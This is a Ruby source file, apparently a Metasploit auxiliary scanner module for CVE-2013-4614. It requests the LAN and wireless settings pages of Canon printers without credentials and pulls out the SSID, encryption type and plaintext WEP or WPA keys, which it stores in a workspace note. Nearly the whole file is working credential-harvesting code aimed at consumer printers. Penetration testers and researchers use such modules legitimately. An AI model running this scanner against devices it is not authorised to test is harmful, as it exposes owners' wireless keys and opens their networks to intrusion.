Path: blob/master/modules/auxiliary/scanner/http/canon_wireless.rb
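##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'nokogiri'

# Auxiliary scanner that reads the LAN and wireless settings pages of a Canon
# printer's web interface and records what they disclose (CVE-2013-4614).
#
# Both pages are requested with a plain GET and the module supplies no
# credentials of its own, so a 200 response means the device returned its
# wireless configuration (including the key fields) without being asked to
# authenticate by this module. A 401 is reported as "Authentication failed".
class MetasploitModule < Msf::Auxiliary
  include Msf::Auxiliary::Report
  include Msf::Exploit::Remote::HttpClient
  include Msf::Auxiliary::Scanner

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Canon Printer Wireless Configuration Disclosure',
        'Description' => %q{
          This module enumerates wireless credentials from Canon printers with a web interface.
          It has been tested on Canon models: MG3100, MG5300, MG6100, MP495, MX340, MX870,
          MX890, MX920.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'Matt "hostess" Andreko <mandreko[at]accuvant.com>'
        ],
        'References' => [
          [ 'CVE', '2013-4614' ],
          [ 'OSVDB', '94417' ],
          [ 'URL', 'https://www.mattandreko.com/2013/06/canon-y-u-no-security.html']
        ],
        'DisclosureDate' => '2013-06-18',
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Reads the LAN settings page and works out which LAN mode is selected.
  #
  # @return [Array(String, String), nil] the LAN mode label and the SSID (the
  #   SSID is only filled in for wireless mode), or nil when the page could not
  #   be fetched or exactly one checked LAN_OPT1 input was not found.
  def get_network_settings
    html = fetch_settings_page('/English/pages_MacUS/lan_set_content.html')
    return if html.nil?

    checked_lan_setting = html.xpath('//input[@name="LAN_OPT1" and @checked]')
    unless checked_lan_setting.count == 1
      print_error("#{rhost}:#{rport} Could not determine LAN Settings.")
      # Explicit nil so run_host's nil check does not depend on what
      # print_error happens to return.
      return
    end

    lan_setting = ''
    ssid = ''
    case checked_lan_setting[0]['value']
    when '0'
      lan_setting = 'Do not use LAN'
    when '1'
      lan_setting = 'Use wired LAN'
    when '2'
      lan_setting = 'Use wireless LAN'

      ssid_input = html.xpath('//input[@name="LAN_TXT1"]')
      ssid = ssid_input[0]['value'] if ssid_input.count == 1
    end

    [lan_setting, ssid]
  end

  # Reads the wireless settings page and extracts the selected encryption mode
  # together with the key value(s) the page carries for that mode.
  #
  # @return [Array(String, String), nil] the encryption label and key (several
  #   WEP keys are joined with ", "), or nil when the page could not be fetched
  #   or no checked WLS_OPT1 input is present.
  def get_wireless_key
    html = fetch_settings_page('/English/pages_MacUS/wls_set_content.html')
    return if html.nil?

    checked_encryption_setting = html.at_xpath('//input[@name="WLS_OPT1" and @checked]')
    if checked_encryption_setting.nil?
      # Previously an unexpected page layout raised NoMethodError on nil here.
      print_error("#{rhost}:#{rport} Could not determine encryption settings.")
      return
    end

    encryption_setting = ''
    encryption_key = ''
    case checked_encryption_setting['value']
    when '0'
      encryption_setting = 'None'
    when '1'
      encryption_setting = 'WEP'
      wep_key_inputs = html.xpath('//input[starts-with(@name, "WLS_TXT1") and not(@value="")]')
      encryption_key = wep_key_inputs.map { |input| input['value'] }.join(', ')
    when '2'
      encryption_setting = 'WPA'
      encryption_key = input_value(html, 'WLS_TXT2')
    when '3'
      encryption_setting = 'WPA2'
      encryption_key = input_value(html, 'WLS_TXT3')
    end

    [encryption_setting, encryption_key]
  end

  # Scanner entry point for one host: collects the settings, stores them as a
  # 'canon.wireless' note and prints a one-line summary.
  #
  # @param ip [String] address of the host being scanned, used as the note's host
  # @return [void]
  def run_host(ip)
    ns = get_network_settings
    return if ns.nil?

    option, ssid = ns
    data = {
      :rhost => rhost,
      :rport => rport,
      :option => option
    }
    # The original referenced an undefined `good_string` here; the summary is
    # now built alongside the note data.
    good_string = "#{rhost}:#{rport} Option: #{option}"

    if option == 'Use wireless LAN'
      data[:ssid] = ssid
      good_string += "\tSSID: #{ssid}"

      # get_wireless_key returns nil on a failed fetch or unexpected page, so
      # the encryption fields are only recorded when it produced a result.
      wireless_key = get_wireless_key
      unless wireless_key.nil?
        data.merge!(
          {
            :encryption_type => wireless_key[0],
            :key => wireless_key[1]
          }
        )
        good_string += "\tEncryption Type: #{wireless_key[0]}"
      end
    end

    # NOTE: data[:key] is the plaintext wireless key. It is stored in the note
    # (and so in the workspace database) but deliberately left out of the
    # console line, which would otherwise copy it into scrollback and spool
    # files. Handle and purge the workspace accordingly.
    report_note({
      :data => data,
      :type => 'canon.wireless',
      :host => ip,
      :port => rport
    })

    print_good good_string
  end

  private

  # Fetches one settings page and parses it.
  #
  # @param uri [String] path of the page on the printer's web interface
  # @return [Nokogiri::HTML::Document, nil] the parsed page on a 200 response;
  #   nil on a connection error, no response, or any other status (401 and 404
  #   are reported, other codes are ignored silently as before).
  def fetch_settings_page(uri)
    begin
      res = send_request_cgi({
        'method' => 'GET',
        'uri' => uri
      })
    rescue StandardError
      # Uses rhost in both callers; get_wireless_key previously interpolated an
      # undefined `ip` here, which raised NameError inside the rescue.
      print_error("#{rhost}:#{rport} Could not connect.")
      return
    end

    return if res.nil?

    case res.code
    when 200
      Nokogiri::HTML(res.body)
    when 401
      print_error("#{rhost}:#{rport} Authentication failed")
      nil
    when 404
      print_error("#{rhost}:#{rport} File not found")
      nil
    end
  end

  # Returns the value attribute of the first input with the given name.
  #
  # @param html [Nokogiri::HTML::Document] parsed settings page
  # @param name [String] input name; only fixed names from this file are passed
  # @return [String] the value, or '' when the input or its value is missing
  def input_value(html, name)
    node = html.at_xpath("//input[@name=\"#{name}\"]")
    node ? node['value'].to_s : ''
  end
end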